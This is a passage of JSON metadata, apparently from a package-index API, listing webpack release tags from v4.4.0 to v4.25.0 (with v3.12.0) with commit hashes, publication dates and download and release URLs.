a":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4